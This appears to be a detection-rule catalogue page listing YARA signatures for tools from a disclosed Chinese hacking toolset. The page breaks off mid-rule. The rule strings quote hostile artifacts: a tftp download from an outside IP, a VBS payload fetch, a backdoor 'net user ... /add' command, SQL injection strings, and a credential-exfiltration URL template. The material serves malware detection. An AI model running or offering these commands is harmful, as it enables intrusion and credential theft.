Malware / file
YARA rules
18,880 rules indexed · pattern-based malware identification
YARA rules identify and classify malware families through binary patterns, strings, and metadata. Rules below come from multiple open repositories. Expand any rule to see its raw signature.
Using these YARA rules
Deploy. Load them into any YARA-capable scanner: your EDR if it supports YARA, the yara CLI against files or a memory image, VirusTotal Retrohunt, or a host scanner like Loki or THOR.
Adapt. Tighten or loosen the string and condition matches for your false-positive tolerance; a rule written for one campaign can over-match on benign files in a different environment.
Scope. These are for hunting known malware families in files and memory and for triaging samples - not for network traffic or log-based detection, which the IDS and Sigma rules cover.
◈
Rules
50 shown of 18,880CN_Honker_CoolScan_scan
Sample from CN Honker Pentest Toolset - file scan.exe
view YARA rule
rule CN_Honker_CoolScan_scan {
meta:
description = "Sample from CN Honker Pentest Toolset - file scan.exe"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "Disclosed CN Honker Pentest Toolset"
date = "2015-06-23"
score = 70
hash = "e1c5fb6b9f4e92c4264c7bea7f5fba9a5335c328"
id = "781446d2-3363-56c3-9767-c7ac70047b68"
strings:
$s0 = "User-agent:\\s{0,32}(huasai|huasai/1.0|\\*)" fullword ascii /* PEStudio Blacklist: strings */
$s1 = "scan web.exe" fullword wide /* PEStudio Blacklist: strings */
condition:
uint16(0) == 0x5a4d and filesize < 3680KB and all of them
}
CN_Honker_Cracker_SHELL
Sample from CN Honker Pentest Toolset - file SHELL.exe
view YARA rule
rule CN_Honker_Cracker_SHELL {
meta:
description = "Sample from CN Honker Pentest Toolset - file SHELL.exe"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "Disclosed CN Honker Pentest Toolset"
date = "2015-06-23"
score = 70
hash = "c1dc349ff44a45712937a8a9518170da8d4ee656"
id = "2249a058-7469-5054-9c51-cb20ef8197ca"
strings:
$s1 = "http://127.0.0.1/error1.asp" fullword ascii /* PEStudio Blacklist: strings */
$s2 = "password,PASSWORD,pass,PASS,Lpass,lpass,Password" fullword wide /* PEStudio Blacklist: strings */
$s3 = "\\SHELL" wide /* PEStudio Blacklist: strings */
$s4 = "WebBrowser1" fullword ascii /* PEStudio Blacklist: strings */
condition:
uint16(0) == 0x5a4d and filesize < 200KB and all of them
}
CN_Honker_DLL_passive_privilege_escalation_ws2help
Sample from CN Honker Pentest Toolset - file ws2help.dll
view YARA rule
rule CN_Honker_DLL_passive_privilege_escalation_ws2help {
meta:
description = "Sample from CN Honker Pentest Toolset - file ws2help.dll"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "Disclosed CN Honker Pentest Toolset"
date = "2015-06-23"
score = 70
hash = "e539b799c18d519efae6343cff362dcfd8f57f69"
id = "85a07bb7-2856-56f0-bd15-e020bb2a7692"
strings:
$s0 = "PassMinDll.dll" fullword ascii
$s1 = "\\ws2help.dll" ascii
condition:
uint16(0) == 0x5a4d and filesize < 30KB and all of them
}
CN_Honker_D_injection_V2_32
Sample from CN Honker Pentest Toolset - file D_injection_V2.32.exe
view YARA rule
rule CN_Honker_D_injection_V2_32 {
meta:
description = "Sample from CN Honker Pentest Toolset - file D_injection_V2.32.exe"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "Disclosed CN Honker Pentest Toolset"
date = "2015-06-23"
score = 70
hash = "3a000b976c79585f62f40f7999ef9bdd326a9513"
id = "4c661c35-61ee-5ee7-9b8e-9908fbe0362b"
strings:
$s0 = "Missing %s property(CommandText does not return a result set{Error creating obje" wide /* PEStudio Blacklist: strings */
$s1 = "/tftp -i 219.134.46.245 get 9493.exe c:\\9394.exe" fullword ascii
condition:
uint16(0) == 0x5a4d and filesize < 5000KB and all of them
}
CN_Honker_DictionaryGenerator
Sample from CN Honker Pentest Toolset - file DictionaryGenerator.exe
view YARA rule
rule CN_Honker_DictionaryGenerator {
meta:
description = "Sample from CN Honker Pentest Toolset - file DictionaryGenerator.exe"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "Disclosed CN Honker Pentest Toolset"
date = "2015-06-23"
score = 70
hash = "b3071c64953e97eeb2ca6796fab302d8a77d27bc"
id = "29ce6f8c-3092-5917-ab31-aaed7834c500"
strings:
$s1 = "`PasswordBuilder" fullword ascii /* PEStudio Blacklist: strings */
$s2 = "cracker" fullword ascii /* PEStudio Blacklist: strings */
condition:
uint16(0) == 0x5a4d and filesize < 3650KB and all of them
}
CN_Honker_F4ck_Team_BlackMoon_Jun15
Sample from CN Honker Pentest Toolset - file f4ck.exe
view YARA rule
rule CN_Honker_F4ck_Team_BlackMoon_Jun15 {
meta:
description = "Sample from CN Honker Pentest Toolset - file f4ck.exe"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "Disclosed CN Honker Pentest Toolset"
old_rule_name = "CN_Honker_F4ck_Team_f4ck_3"
date = "2015-06-23"
score = 70
hash = "7e3bf9b26df08cfa10f10e2283c6f21f5a3a0014"
id = "df12daca-8e03-5382-b71d-96a747d3a043"
strings:
$s1 = "File UserName PassWord [comment] /add" fullword ascii /* PEStudio Blacklist: strings */
$s2 = "No Net.exe Add User" fullword ascii
$s3 = "BlackMoon RunTime Error:" fullword ascii
$s4 = "Team.F4ck.Net" fullword wide
$s5 = "admin 123456789" fullword ascii /* PEStudio Blacklist: strings */
$s6 = "blackmoon" fullword ascii
$s7 = "f4ck Team" fullword wide
condition:
uint16(0) == 0x5a4d and filesize < 100KB and 4 of them
}
CN_Honker_F4ck_Team_F4ck_3
Sample from CN Honker Pentest Toolset - file F4ck_3.exe
view YARA rule
rule CN_Honker_F4ck_Team_F4ck_3 {
meta:
description = "Sample from CN Honker Pentest Toolset - file F4ck_3.exe"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "Disclosed CN Honker Pentest Toolset"
date = "2015-06-23"
score = 70
hash = "0b3e9381930f02e170e484f12233bbeb556f3731"
id = "1767669f-47d0-5d6e-97a5-92522f988102"
strings:
$s1 = "F4ck.exe" fullword wide
$s2 = "@Netapi32.dll" fullword ascii
$s3 = "Team.F4ck.Net" fullword wide
$s6 = "NO Net Add User" fullword wide
$s7 = "DLL ERROR" fullword ascii
$s11 = "F4ck Team" fullword wide
condition:
uint16(0) == 0x5a4d and filesize < 100KB and 3 of them
}
CN_Honker_F4ck_Team_f4ck
Script from disclosed CN Honker Pentest Toolset - file f4ck.txt
view YARA rule
rule CN_Honker_F4ck_Team_f4ck {
meta:
description = "Script from disclosed CN Honker Pentest Toolset - file f4ck.txt"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "Disclosed CN Honker Pentest Toolset"
date = "2015-06-23"
score = 70
hash = "e216f4ba3a07de5cdbb12acc038cd8156618759e"
id = "abf2f277-79b4-5ca2-b12e-93a662e5d607"
strings:
$s0 = "PassWord:F4ckTeam!@#" fullword ascii /* PEStudio Blacklist: strings */
$s1 = "UserName:F4ck" fullword ascii /* PEStudio Blacklist: strings */
$s2 = "F4ck Team" fullword ascii
condition:
filesize < 1KB and all of them
}
CN_Honker_F4ck_Team_f4ck_2
Sample from CN Honker Pentest Toolset - file f4ck_2.exe
view YARA rule
rule CN_Honker_F4ck_Team_f4ck_2 {
meta:
description = "Sample from CN Honker Pentest Toolset - file f4ck_2.exe"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "Disclosed CN Honker Pentest Toolset"
date = "2015-06-23"
score = 70
hash = "0783661077312753802bd64bf5d35c4666ad0a82"
id = "b2a9067f-57d0-5b32-87c8-3b635c3944a5"
strings:
$s1 = "F4ck.exe" fullword wide
$s2 = "@Netapi32.dll" fullword ascii
$s3 = "Team.F4ck.Net" fullword wide
$s8 = "Administrators" fullword ascii /* PEStudio Blacklist: strings */ /* Goodware String - occured 14 times */
$s9 = "F4ck Team" fullword wide
condition:
uint16(0) == 0x5a4d and filesize < 220KB and 2 of them
}
CN_Honker_FTP_scanning
Sample from CN Honker Pentest Toolset - file FTP_scanning.exe
view YARA rule
rule CN_Honker_FTP_scanning {
meta:
description = "Sample from CN Honker Pentest Toolset - file FTP_scanning.exe"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "Disclosed CN Honker Pentest Toolset"
date = "2015-06-23"
score = 70
hash = "5a3543ee5aed110c87cbc3973686e785bcb5c44e"
id = "828a0dc8-3748-5c07-a767-4f9e85968ca1"
strings:
$s1 = "CNotSupportedE" fullword ascii /* PEStudio Blacklist: strings */
$s2 = "nINet.dll" fullword ascii
$s9 = "?=MODULE" fullword ascii /* PEStudio Blacklist: strings */
$s13 = "MSIE 6*" fullword ascii
condition:
uint16(0) == 0x5a4d and filesize < 550KB and all of them
}
CN_Honker_Fckeditor
Sample from CN Honker Pentest Toolset - file Fckeditor.exe
view YARA rule
rule CN_Honker_Fckeditor {
meta:
description = "Sample from CN Honker Pentest Toolset - file Fckeditor.exe"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "Disclosed CN Honker Pentest Toolset"
date = "2015-06-23"
score = 70
hash = "4b16ae12c204f64265acef872526b27111b68820"
id = "eb8767cb-b081-5c37-b7ad-57a0de047462"
strings:
$s0 = "explorer.exe http://user.qzone.qq.com/568148075" fullword wide /* PEStudio Blacklist: strings */
$s7 = "Fckeditor.exe" fullword wide /* PEStudio Blacklist: strings */
condition:
uint16(0) == 0x5a4d and filesize < 1340KB and all of them
}
CN_Honker_Fpipe_FPipe
Sample from CN Honker Pentest Toolset - file FPipe.exe
view YARA rule
rule CN_Honker_Fpipe_FPipe {
meta:
description = "Sample from CN Honker Pentest Toolset - file FPipe.exe"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "Disclosed CN Honker Pentest Toolset"
date = "2015-06-23"
score = 50
hash = "a2c51c6fa93a3dfa14aaf31fb1c48a3a66a32d11"
id = "0d84aa8f-dc15-5bb7-a568-224c6a837685"
strings:
$s1 = "Unable to create TCP listen socket. %s%d" fullword ascii /* PEStudio Blacklist: strings */
$s2 = "http://www.foundstone.com" fullword ascii
$s3 = "%s %s port %d. Address is already in use" fullword ascii /* PEStudio Blacklist: strings */
condition:
uint16(0) == 0x5a4d and filesize < 20KB and all of them
}
CN_Honker_GetHashes
Sample from CN Honker Pentest Toolset - file GetHashes.exe
view YARA rule
rule CN_Honker_GetHashes {
meta:
description = "Sample from CN Honker Pentest Toolset - file GetHashes.exe"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "Disclosed CN Honker Pentest Toolset"
date = "2015-06-23"
score = 70
hash = "dc8bcebf565ffffda0df24a77e28af681227b7fe"
id = "b1c5910d-0fb1-547e-92b7-5fcf183e38a6"
strings:
$s0 = "SAM\\Domains\\Account\\Users\\Names registry hive reading error!" fullword ascii /* PEStudio Blacklist: strings */
$s1 = "GetHashes <SAM registry file> [System key file]" fullword ascii /* PEStudio Blacklist: strings */
$s2 = "Note: Windows registry file shall begin from 'regf' signature!" fullword ascii /* PEStudio Blacklist: strings */
condition:
uint16(0) == 0x5a4d and filesize < 87KB and 2 of them
}
CN_Honker_GetHashes_2
Sample from CN Honker Pentest Toolset - file GetHashes.exe
view YARA rule
rule CN_Honker_GetHashes_2 {
meta:
description = "Sample from CN Honker Pentest Toolset - file GetHashes.exe"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "Disclosed CN Honker Pentest Toolset"
date = "2015-06-23"
score = 70
hash = "35ae9ccba8d607d8c19a065cf553070c54b091d8"
id = "31117d2e-caf1-58c9-8525-b40b73097928"
strings:
$s1 = "GetHashes.exe <SAM registry file> [System key file]" fullword ascii /* PEStudio Blacklist: strings */
$s2 = "GetHashes.exe $Local" fullword ascii
$s3 = "The system key doesn't match SAM registry file!" fullword ascii /* PEStudio Blacklist: strings */
condition:
uint16(0) == 0x5a4d and filesize < 300KB and 2 of them
}
CN_Honker_GetPass_GetPass
Sample from CN Honker Pentest Toolset - file GetPass.exe
view YARA rule
rule CN_Honker_GetPass_GetPass {
meta:
description = "Sample from CN Honker Pentest Toolset - file GetPass.exe"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "Disclosed CN Honker Pentest Toolset"
date = "2015-06-23"
score = 70
hash = "d18d952b24110b83abd17e042f9deee679de6a1a"
id = "999d0ac0-a112-53db-9dbe-10fa4419cfae"
strings:
$s1 = "\\only\\Desktop\\" ascii
$s2 = "To Run As Administuor" ascii /* PEStudio Blacklist: strings */
$s3 = "Key to EXIT ... & pause > nul" fullword ascii /* PEStudio Blacklist: strings */
condition:
uint16(0) == 0x5a4d and filesize < 300KB and all of them
}
CN_Honker_GetSyskey
Sample from CN Honker Pentest Toolset - file GetSyskey.exe
view YARA rule
rule CN_Honker_GetSyskey {
meta:
description = "Sample from CN Honker Pentest Toolset - file GetSyskey.exe"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "Disclosed CN Honker Pentest Toolset"
date = "2015-06-23"
score = 70
hash = "17cec5e75cda434d0a1bc8cdd5aa268b42633fe9"
id = "08f5b5b1-3085-5bf1-9789-023be5a039f8"
strings:
$s2 = "GetSyskey <SYSTEM registry file> [Output system key file]" fullword ascii /* PEStudio Blacklist: strings */
$s4 = "The system key file \"%s\" is created." fullword ascii /* PEStudio Blacklist: strings */
condition:
uint16(0) == 0x5a4d and filesize < 40KB and all of them
}
CN_Honker_GetWebShell
Sample from CN Honker Pentest Toolset - file GetWebShell.exe
view YARA rule
rule CN_Honker_GetWebShell {
meta:
description = "Sample from CN Honker Pentest Toolset - file GetWebShell.exe"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "Disclosed CN Honker Pentest Toolset"
date = "2015-06-23"
score = 70
hash = "b63b53259260a7a316932c0a4b643862f65ee9f8"
id = "919883f4-af66-5d07-ad41-8cba3e049396"
strings:
$s0 = "echo P.Open \"GET\",\"http://www.baidu.com/ma.exe\",0 >>run.vbs" fullword ascii /* PEStudio Blacklist: strings */
$s5 = "http://127.0.0.1/sql.asp?id=1" fullword wide /* PEStudio Blacklist: strings */
$s14 = "net user admin$ hack /add" fullword wide /* PEStudio Blacklist: strings */
$s15 = ";Drop table [hack];create table [dbo].[hack] ([cmd] [image])--" fullword wide /* PEStudio Blacklist: strings */
condition:
uint16(0) == 0x5a4d and filesize < 70KB and 1 of them
}
CN_Honker_GroupPolicyRemover
Sample from CN Honker Pentest Toolset - file GroupPolicyRemover.exe
view YARA rule
rule CN_Honker_GroupPolicyRemover {
meta:
description = "Sample from CN Honker Pentest Toolset - file GroupPolicyRemover.exe"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "Disclosed CN Honker Pentest Toolset"
date = "2015-06-23"
score = 70
hash = "7475d694e189b35899a2baa462957ac3687513e5"
id = "e581172d-fcea-5281-ba9f-06b35c9a513e"
strings:
$s0 = "GP_killer.EXE" fullword wide /* PEStudio Blacklist: strings */
$s1 = "GP_killer Microsoft " fullword wide /* PEStudio Blacklist: strings */
$s2 = "SHDeleteKeyA" fullword ascii /* PEStudio Blacklist: strings */ /* Goodware String - occured 79 times */
condition:
uint16(0) == 0x5a4d and filesize < 700KB and all of them
}
CN_Honker_HASH_32
Sample from CN Honker Pentest Toolset - file 32.exe
view YARA rule
rule CN_Honker_HASH_32 {
meta:
description = "Sample from CN Honker Pentest Toolset - file 32.exe"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "Disclosed CN Honker Pentest Toolset"
date = "2015-06-23"
score = 70
hash = "bf4a8b4b3e906e385feab5ea768f604f64ba84ea"
id = "a9b5b753-2028-53be-9ac8-50ec910860c3"
strings:
$s5 = "[Undefined OS version] Major: %d Minor: %d" fullword ascii
$s8 = "Try To Run As Administrator ..." fullword ascii /* PEStudio Blacklist: strings */
$s9 = "Specific LUID NOT found" fullword ascii
condition:
uint16(0) == 0x5a4d and filesize < 240KB and all of them
}
CN_Honker_HASH_PwDump7
Sample from CN Honker Pentest Toolset - file PwDump7.exe
view YARA rule
rule CN_Honker_HASH_PwDump7 {
meta:
description = "Sample from CN Honker Pentest Toolset - file PwDump7.exe"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "Disclosed CN Honker Pentest Toolset"
date = "2015-06-23"
score = 70
hash = "93a2d7c3a9b83371d96a575c15fe6fce6f9d50d3"
id = "d61a1ac3-7c8a-5de2-a5a8-2a043b73f3b3"
strings:
$s1 = "%s\\SYSTEM32\\CONFIG\\SAM" fullword ascii /* PEStudio Blacklist: strings */
$s2 = "No Users key!" fullword ascii /* PEStudio Blacklist: strings */
$s3 = "NO PASSWORD*********************:" fullword ascii /* PEStudio Blacklist: strings */
$s4 = "Unable to dump file %S" fullword ascii /* PEStudio Blacklist: strings */
condition:
uint16(0) == 0x5a4d and filesize < 380KB and all of them
}
CN_Honker_HASH_pwhash
Sample from CN Honker Pentest Toolset - file pwhash.exe
view YARA rule
rule CN_Honker_HASH_pwhash {
meta:
description = "Sample from CN Honker Pentest Toolset - file pwhash.exe"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "Disclosed CN Honker Pentest Toolset"
date = "2015-06-23"
score = 70
hash = "689056588f95749f0382d201fac8f58bac393e98"
id = "5d8c3648-a725-5f01-9800-b75b8c740cf1"
strings:
$s1 = "Example: quarks-pwdump.exe --dump-hash-domain --with-history" fullword ascii /* PEStudio Blacklist: strings */
$s2 = "quarks-pwdump.exe <options> <NTDS file>" fullword ascii /* PEStudio Blacklist: strings */
condition:
uint16(0) == 0x5a4d and filesize < 1000KB and 1 of them
}
CN_Honker_HTran2_4
Sample from CN Honker Pentest Toolset - file HTran2.4.exe
view YARA rule
rule CN_Honker_HTran2_4 {
meta:
description = "Sample from CN Honker Pentest Toolset - file HTran2.4.exe"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "Disclosed CN Honker Pentest Toolset"
date = "2015-06-23"
score = 70
hash = "524f986692f55620013ab5a06bf942382e64d38a"
id = "21cb5ec5-900d-5092-8c2b-2d951289957c"
strings:
$s1 = "Enter Your Socks Type No: [0.BindPort 1.ConnectBack 2.Listen]:" fullword ascii /* PEStudio Blacklist: strings */
$s2 = "[+] New connection %s:%d !!" fullword ascii /* PEStudio Blacklist: strings */
condition:
uint16(0) == 0x5a4d and filesize < 180KB and all of them
}
CN_Honker_Happy_Happy
Sample from CN Honker Pentest Toolset - file Happy.exe
view YARA rule
rule CN_Honker_Happy_Happy {
meta:
description = "Sample from CN Honker Pentest Toolset - file Happy.exe"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "Disclosed CN Honker Pentest Toolset"
date = "2015-06-23"
modified = "2023-01-27"
score = 70
hash = "92067d8dad33177b5d6c853d4d0e897f2ee846b0"
id = "6e6c806d-e784-507f-b327-3b9f2510422b"
strings:
$s1 = "<form.*?method=\"post\"[\\s\\S]*?</form>" fullword wide /* PEStudio Blacklist: strings */
$s2 = "domainscan.exe" fullword wide /* PEStudio Blacklist: strings */
$s3 = "http://www.happysec.com/" wide
$s4 = "cmdshell" fullword ascii /* PEStudio Blacklist: strings */
condition:
uint16(0) == 0x5a4d and filesize < 655KB and 2 of them
}
CN_Honker_Havij_Havij
Sample from CN Honker Pentest Toolset - file Havij.exe
view YARA rule
rule CN_Honker_Havij_Havij {
meta:
description = "Sample from CN Honker Pentest Toolset - file Havij.exe"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "Disclosed CN Honker Pentest Toolset"
date = "2015-06-23"
score = 70
hash = "0d8b275bd1856bc6563dd731956f3b312e1533cd"
id = "b3640a32-b546-58c9-abb1-3da60dc6633c"
strings:
$s1 = "User-Agent: %Inject_Here%" fullword wide /* PEStudio Blacklist: strings */
$s2 = "BACKUP database master to disk='d:\\Inetpub\\wwwroot\\1.zip'" fullword ascii /* PEStudio Blacklist: strings */
condition:
uint16(0) == 0x5a4d and filesize < 3000KB and all of them
}
CN_Honker_HconSTFportable
Sample from CN Honker Pentest Toolset - file HconSTFportable.exe
view YARA rule
rule CN_Honker_HconSTFportable {
meta:
description = "Sample from CN Honker Pentest Toolset - file HconSTFportable.exe"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "Disclosed CN Honker Pentest Toolset"
date = "2015-06-23"
score = 70
hash = "00253a00eadb3ec21a06911a3d92728bbbe80c09"
id = "591cbd4a-0035-5903-a7dc-8f8ee6dc9f50"
strings:
$s1 = "HconSTFportable.exe" fullword wide /* PEStudio Blacklist: strings */
$s2 = "www.Hcon.in" fullword wide
condition:
uint16(0) == 0x5a4d and filesize < 354KB and all of them
}
CN_Honker_Hookmsgina
Sample from CN Honker Pentest Toolset - file Hookmsgina.dll
view YARA rule
rule CN_Honker_Hookmsgina {
meta:
description = "Sample from CN Honker Pentest Toolset - file Hookmsgina.dll"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "Disclosed CN Honker Pentest Toolset"
date = "2015-06-23"
score = 70
hash = "f4d9b329b45fbcf6a3b9f29f2633d5d3d76c9f9d"
id = "77813637-ec9f-599c-90c9-be1dd93b45f7"
strings:
$s1 = "\\\\.\\pipe\\WinlogonHack" fullword ascii /* PEStudio Blacklist: strings */
$s2 = "%s?host=%s&domain=%s&user=%s&pass=%s&port=%u" fullword ascii /* PEStudio Blacklist: strings */
$s3 = "Global\\WinlogonHack_Load%u" fullword ascii /* PEStudio Blacklist: strings */
$s4 = "Hookmsgina.dll" fullword ascii /* PEStudio Blacklist: strings */
condition:
uint16(0) == 0x5a4d and filesize < 300KB and all of them
}
CN_Honker_Htran_V2_40_htran20
Sample from CN Honker Pentest Toolset - file htran20.exe
view YARA rule
rule CN_Honker_Htran_V2_40_htran20 {
meta:
description = "Sample from CN Honker Pentest Toolset - file htran20.exe"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "Disclosed CN Honker Pentest Toolset"
date = "2015-06-23"
score = 70
hash = "b992bf5b04d362ed3757e90e57bc5d6b2a04e65c"
id = "9dd1ab4b-108e-55be-b94d-2868ce00855e"
strings:
$s1 = "%s -slave ConnectHost ConnectPort TransmitHost TransmitPort" fullword ascii /* PEStudio Blacklist: strings */
$s2 = "Enter Your Socks Type No: [0.BindPort 1.ConnectBack 2.Listen]:" fullword ascii /* PEStudio Blacklist: strings */
$s3 = "[SERVER]connection to %s:%d error" fullword ascii /* PEStudio Blacklist: strings */
$s4 = "%s -connect ConnectHost [ConnectPort] Default:%d" fullword ascii /* PEStudio Blacklist: strings */
$s5 = "[+] got, ip:%s, port:%d" fullword ascii /* PEStudio Blacklist: strings */
$s6 = "[-] There is a error...Create a new connection." fullword ascii /* PEStudio Blacklist: strings */
condition:
uint16(0) == 0x5a4d and filesize < 200KB and all of them
}
CN_Honker_IIS6_iis6
Sample from CN Honker Pentest Toolset - file iis6.com
view YARA rule
rule CN_Honker_IIS6_iis6 {
meta:
description = "Sample from CN Honker Pentest Toolset - file iis6.com"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "Disclosed CN Honker Pentest Toolset"
date = "2015-06-23"
score = 70
hash = "f0c9106d6d2eea686fd96622986b641968d0b864"
id = "f5d49cbd-1aec-5126-ab5d-83e485fa6869"
strings:
$s0 = "GetMod;ul" fullword ascii
$s1 = "excjpb" fullword ascii
$s2 = "LEAUT1" fullword ascii
$s3 = "EnumProcessModules" fullword ascii /* PEStudio Blacklist: strings */ /* Goodware String - occured 410 times */
condition:
uint16(0) == 0x5a4d and filesize < 50KB and all of them
}
CN_Honker_IIS_logcleaner1_0_readme
Script from disclosed CN Honker Pentest Toolset - file readme.txt
view YARA rule
rule CN_Honker_IIS_logcleaner1_0_readme {
meta:
description = "Script from disclosed CN Honker Pentest Toolset - file readme.txt"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "Disclosed CN Honker Pentest Toolset"
date = "2015-06-23"
score = 70
hash = "2ab47d876b49e9a693f602f3545381415e82a556"
id = "6f3605ab-cf9d-5f6b-8d89-6269976c5b0b"
strings:
$s2 = "LogCleaner.exe <ip> [Logpath]" fullword ascii
$s3 = "http://l-y.vicp.net" fullword ascii
condition:
filesize < 7KB and all of them
}
CN_Honker_Injection
Sample from CN Honker Pentest Toolset - file Injection.exe
view YARA rule
rule CN_Honker_Injection {
meta:
description = "Sample from CN Honker Pentest Toolset - file Injection.exe"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "Disclosed CN Honker Pentest Toolset"
date = "2015-06-23"
score = 70
hash = "3484ed16e6f9e0d603cbc5cb44e46b8b7e775d35"
id = "8600c86f-0da1-5ddb-bae5-69358cf53e7c"
strings:
$s0 = "http://127.0.0.1/6kbbs/bank.asp" fullword ascii /* PEStudio Blacklist: strings */
$s7 = "jmPost.asp" fullword wide /* PEStudio Blacklist: strings */
condition:
uint16(0) == 0x5a4d and filesize < 220KB and all of them
}
CN_Honker_Injection_Transit_jmCook
Script from disclosed CN Honker Pentest Toolset - file jmCook.asp
view YARA rule
rule CN_Honker_Injection_Transit_jmCook {
meta:
description = "Script from disclosed CN Honker Pentest Toolset - file jmCook.asp"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "Disclosed CN Honker Pentest Toolset"
date = "2015-06-23"
score = 70
hash = "5e1851c77ce922e682333a3cb83b8506e1d7395d"
id = "468abb0e-a163-5fc5-b6a1-896fc04b8570"
strings:
$s1 = ".Open \"POST\",PostUrl,False" fullword ascii /* PEStudio Blacklist: strings */
$s2 = "JmdcwName=request(\"jmdcw\")" fullword ascii /* PEStudio Blacklist: strings */
condition:
filesize < 9KB and all of them
}
CN_Honker_Injection_transit
Sample from CN Honker Pentest Toolset - file Injection_transit.exe
view YARA rule
rule CN_Honker_Injection_transit {
meta:
description = "Sample from CN Honker Pentest Toolset - file Injection_transit.exe"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "Disclosed CN Honker Pentest Toolset"
date = "2015-06-23"
score = 70
hash = "f4fef2e3d310494a3c3962a49c7c5a9ea072b2ea"
id = "8600c86f-0da1-5ddb-bae5-69358cf53e7c"
strings:
$s0 = "<description>Your app description here</description> " fullword ascii /* PEStudio Blacklist: strings */
$s4 = "Copyright (C) 2003 ZYDSoft Corp." fullword wide /* PEStudio Blacklist: os */
$s5 = "ScriptnackgBun" fullword ascii /* PEStudio Blacklist: strings */
condition:
uint16(0) == 0x5a4d and filesize < 3175KB and all of them
}
CN_Honker_Interception
Sample from CN Honker Pentest Toolset - file Interception.exe
view YARA rule
rule CN_Honker_Interception {
meta:
description = "Sample from CN Honker Pentest Toolset - file Interception.exe"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "Disclosed CN Honker Pentest Toolset"
date = "2015-06-23"
score = 70
hash = "ea813aed322e210ea6ae42b73b1250408bf40e7a"
id = "40d350e5-c6af-58e2-a1d8-f9516af5f869"
strings:
$s2 = ".\\dat\\Hookmsgina.dll" fullword ascii /* PEStudio Blacklist: strings */
$s5 = "WinlogonHackEx " fullword wide /* PEStudio Blacklist: strings */
condition:
uint16(0) == 0x5a4d and filesize < 160KB and all of them
}
CN_Honker_Interception3389_setup
Sample from CN Honker Pentest Toolset - file setup.exe
view YARA rule
rule CN_Honker_Interception3389_setup {
meta:
description = "Sample from CN Honker Pentest Toolset - file setup.exe"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "Disclosed CN Honker Pentest Toolset"
date = "2015-06-23"
score = 70
hash = "f5b2f86f8e7cdc00aa1cb1b04bc3d278eb17bf5c"
